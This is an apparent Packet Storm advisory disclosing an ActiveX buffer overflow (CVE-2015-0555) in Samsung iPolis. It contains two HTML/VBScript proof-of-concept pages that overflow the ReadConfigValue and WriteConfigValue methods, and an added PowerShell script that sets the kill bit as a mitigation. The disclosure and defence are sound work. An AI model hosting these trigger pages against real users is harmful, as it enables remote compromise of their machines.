packetstorm | Praveen Darshanam | PACKETSTORM:130478
History: Feb 21, 2015 - 12:00 a.m.

Samsung iPolis Buffer Overflow

packetstormsecurity.com

EPSS: 0.134 (Low), Percentile: 95.6%

`CVE-2015-0555  
  
Introduction  
*************************************************************  
  
There is a buffer overflow vulnerability which leads to remote code  
execution.  
The vulnerability is due to improper input validation in the ReadConfigValue  
and WriteConfigValue APIs of XnsSdkDeviceIpInstaller.ocx.  
  
This is different from CVE-2014-3911: the affected version here is iPolis  
1.12.2 (latest as of 12/12/2014), whereas CVE-2014-3911 relates to a  
different ActiveX control in an older iPolis version.  
  
Discovery Method: Fuzzing  
Exploiting: It is a client-side attack in which an attacker hosts a crafted  
HTML web page with a malicious payload and entices the victim to browse to  
the hosted page in order to compromise the victim.  
  
Operating System: Windows 7 Ultimate N SP1  
  
*************************************************************  
Vulnerability1:  
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*  
******************Proof of Concept (PoC)***************  
<html>  
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()  
Remote Code Execution</head>  
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"  
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"  
memberName = "ReadConfigValue"  
progid = "XNSSDKDEVICELib.XnsSdkDevice"  
argCount = 1  
  
arg1=String(1044, "A")  
  
target.ReadConfigValue arg1  
  
</script>  
</html>  
  
  
*****************************************************************************************  
Vulnerability2:  
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution*  
  
*******************Proof of Concept (PoC)*********************  
  
<html>  
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />  
<script language='vbscript'>  
  
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"  
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"  
memberName = "WriteConfigValue"  
progid = "XNSSDKDEVICELib.XnsSdkDevice"  
argCount = 2  
  
arg1=String(14356, "A")  
arg2="defaultV"  
  
target.WriteConfigValue arg1 ,arg2  
  
</script>  
</html>  
****************************************************************************  
  
CERT contacted Samsung, but there was no response from Samsung.  
Refer to http://blog.disects.com for more details.  
  
Best Regards,  
Praveen Darshanam  
  
  
`
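
Because both PoCs reach the control through an `<object>` tag in a web page, a defender can stop Internet Explorer from instantiating it by setting the ActiveX kill bit for that CLSID. The script below is an added example, not part of the advisory or of any Samsung guidance; the CLSID is taken from the PoCs, and it assumes an elevated prompt and that Internet Explorer (or another host that honors the kill bit) is the exposure path.

```powershell
# Added example, not part of the advisory. Run from an elevated prompt.
$Clsid   = '{D3B78638-78BA-4587-88FE-0537A0825A72}'  # classid from the PoC <object> tags
$KillBit = 0x400                                      # kill-bit value of "Compatibility Flags"
$Name    = 'Compatibility Flags'

# 64-bit Windows has a separate registry view for 32-bit Internet Explorer.
$Views = @('HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node')

function Set-ActiveXKillBit {
    param([string]$SoftwareRoot, [string]$Clsid)

    $key = Join-Path $SoftwareRoot "Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already present and OR the kill bit in.
    $existing = (Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue).$Name
    if ($null -eq $existing) { $existing = 0 }
    $value = $existing -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name $Name -PropertyType DWord -Value $value -Force | Out-Null

    # Read the value back so the report reflects what is actually stored.
    $stored = (Get-ItemProperty -LiteralPath $key -Name $Name).$Name
    [pscustomobject]@{
        Key        = $key
        # True if the control is registered machine-wide in this registry view.
        Registered = Test-Path -LiteralPath (Join-Path $SoftwareRoot "Classes\CLSID\$Clsid")
        Flags      = '0x{0:X8}' -f $stored
        KillBitSet = ($stored -band $KillBit) -eq $KillBit
    }
}

# Skip the Wow6432Node view on 32-bit systems, where it does not exist.
$Views | Where-Object { Test-Path -LiteralPath $_ } |
    ForEach-Object { Set-ActiveXKillBit -SoftwareRoot $_ -Clsid $Clsid } |
    Format-List
```

The kill bit only blocks hosts that check it; applications that load XnsSdkDeviceIpInstaller.ocx directly are unaffected, so the control remains vulnerable until it is removed or replaced.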